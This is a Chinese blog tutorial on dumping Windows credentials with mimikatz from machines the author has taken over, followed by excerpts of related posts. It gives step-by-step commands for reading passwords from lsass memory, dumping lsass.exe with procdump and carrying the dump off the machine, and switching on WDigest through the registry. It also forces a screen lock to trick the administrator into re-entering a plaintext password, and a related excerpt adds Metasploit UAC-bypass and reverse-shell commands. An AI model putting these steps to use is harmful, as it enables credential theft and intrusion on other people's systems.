mimikatz的使用

最新推荐文章于 2025-03-17 20:00:16 发布
最新推荐文章于 2025-03-17 20:00:16 发布
阅读量3.3w 收藏 110
点赞数 35
分类专栏: Windows 文章标签: mimikatz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45663905/article/details/108013149
版权

目录

mimikatz是个好东西,它的功能很多,最重要的是能从 lsass.exe进程中获取windows的账号及明文密码——这是以前的事了,微软知道后已经准备了补丁,lsass进程不再保存明文口令。Mimikatz 现在只能读到加密后的密码。

使用方法:

1:远程连接使用

控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行

privilege::debug   提取权限
sekurlsa::logonpasswords   抓取密码

在这里插入图片描述
这里抓到了administrator的账号,密码是null,说明没设密码;当然,最大的可能是没抓到密码。解决方法可以看看注意的第四点

在这里插入图片描述

2:本地使用

如果对方电脑开了防火墙,装了杀毒软件,如360,火绒,nod32之类的话。可能就不能在对方电脑上使用mimikatz
在这里插入图片描述
前面说过,mimikatz是从 lsass.exe进程中获取windows的账号及密码的,
这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用)

然后从 lsass.exe进程里导出一个 包含账号密码信息的lsass.dmp 文件,再把这个dmp文件传回来,最后在自己的环境下运行mimikatz,从 dmp文件里读取信息。

1、安装procdump64.exe

2、从procdump64.exe里导出lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

3、将lsass.dmp传回本地

4、使用本地的mimikatz.exe读取lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

我没有搞成功,就不贴图了

可以参考这几篇文章
http://www.hackdig.com/07/hack-55560.htm
https://www.cnblogs.com/kuaile1314/p/12288476.html

注意:

1、版本问题

文件夹里有两个版本,一个是对应32位系统的,一个是64位系统的。搞混了是抓不到信息的

在这里插入图片描述

2、运行权限

一定要用管理员身份运行

在这里插入图片描述

不然会提示权限不够

在这里插入图片描述

3、抓取范围

因为它是从 lsass.exe进程中获取windows的账号密码,而每次关机重启后,lsass进程中的账号信息都会清空

所以只能抓到上次关机后登录过的账号密码的信息

4、抓不到密码的解决方法

以下操作都在cmd里进行

  1. 开启Wdigest Auth服务
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  1. 强制锁屏
rundll32 user32.dll,LockWorkStation
  1. 等待目标系统管理员重新登录
  2. 截取明文密码
  3. 关闭Wdigest Auth服务
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

但是我在写的时候出错了,说无效项名,也不知道啥原因
百度半天也没解决这个问题,暂时先记下来,等找到解决方案了再写
在这里插入图片描述

mimikatz下载链接

1、百度云盘,提取码是 kcuh
2、csdn

技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3438
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 8万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
内网渗透工具(Mimikatz
最新发布
尘玥的故事
03-17 884
能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,Mimikatz使用通常需要管理员权限,因为它需要访问系统的核心进程和内存。注意:当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码。
mimikatz使用详解
qq_59468567的博客
04-12 1035
该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限,因此需要执行提权命令,如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。
mimikatz的基本使用
a3320315的博客
05-25 1万+
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
Mimikatz使用方法
她叫常玉莹
08-21 1万+
Mimikatz命令抓取明文密码模块sekurlsa模块kerberos模块lsadump模块WDigestLSA保护获取高版本Windows系统的密码凭证msf中kiwi模块kiwi模块使用kiwi模块命令creds_allkiwi_cmd Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 Mimikatz命令 cls:清屏 standa..
[后渗透]Mimikatz使用大全1
08-03
【后渗透技术】Mimikatz使用详解 Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统权限提升、密码获取和安全审计。它以其强大的功能在网络安全领域广受欢迎,特别是在渗透测试和红队操作...
mimikatz使用方法
课嗨教育的专栏
04-23 3968
0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
mimikatz使用
mirror97black的博客
04-11 7146
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行) lsadump::lsa ...
Mimikatz使用
qq_46804551的博客
04-04 920
简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要
mimikatz使用以及源码动态分析
weixin_46956745的博客
05-08 3321
mimikatz使用以及源码分析 文章目录mimikatz使用以及源码分析前言一、mimikatz安装运行二、mimikatz源码分析1.函数具体功能2.函数源码分析(动态)总结 前言 Mimikatz 是法国人 Gentil Kiwi 编写的一款 windows 平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取 windows 处于 active 状态账号的明文密码。mimikatz 的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz
mimikatz.zip
08-14
mimikatz 是一款windows平台下的工具,它具备很多强大的功能,最重要的是可以从lsass.exe进程中获取windows的账号明文密码。
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
mimikatz工具
03-08
本工具可以提取存于windows电脑内存中的密码,安全无毒,最新版工具.
内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
2401_84446919的博客
04-18 1662
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
mimikatz 使用
ZKCQM23的博客
09-09 4134
我就说一个,如果爆ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 右击以管理员身份打开就可以了 或者在开始菜单的CMD里,cd到目录打开
kali mimikatz使用教程
02-28
### Kali Linux 上 Mimikatz使用教程 #### 安装与准备 Kali Linux 是基于 Debian 的操作系统,因此可以利用 `apt` 软件包管理器来安装所需的工具。对于 Mimikatz,在较新的版本中,其功能已经被集成到了 Kiwi 模块之中[^4]。 为了确保能够顺利运行 Mimikatz 或者说 Kiwi 模块的功能,操作环境应当具有足够的权限——即 system 权限。这意味着如果通过 Metasploit Framework (MSF) 进行攻击,则需先将现有的 shell 提升至 system 级别。 #### 获取并加载 Mimikatz/Kiwi 在终端输入如下命令以启动带有 mimikatz 功能的 kiwi 模块: ```bash use exploit/windows/local/bypassuac set payload windows/x64/meterpreter/reverse_tcp exploit -j -z sessions -l sessions -i <session_id> load kiwi ``` 上述脚本假设读者正在使用 MSF 并已成功建立了一个 session。最后一行用于载入 kiwi 模块以便后续调用 mimikatz 命令。 #### 密码提取 一旦获得了适当级别的访问控制权之后,就可以尝试从内存或其他位置检索凭证信息了。例如,要转储 SAM 数据库中的散列值,可执行以下指令: ```bash privilege::debug sekurlsa::logonpasswords ``` 第一条命令赋予进程调试特权,这对于许多 mimikatz 操作来说都是必需的前提条件之一。第二条则会显示登录用户的明文密码以及哈希值(如果有),这些数据按照认证 ID、包名、域/机器名称、用户名和密码的形式被呈现出来[^5]。 请注意,这里所描述的过程仅适用于合法授权的安全测试活动当中,并且应该遵循所有适用法律及道德准则来进行实践。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值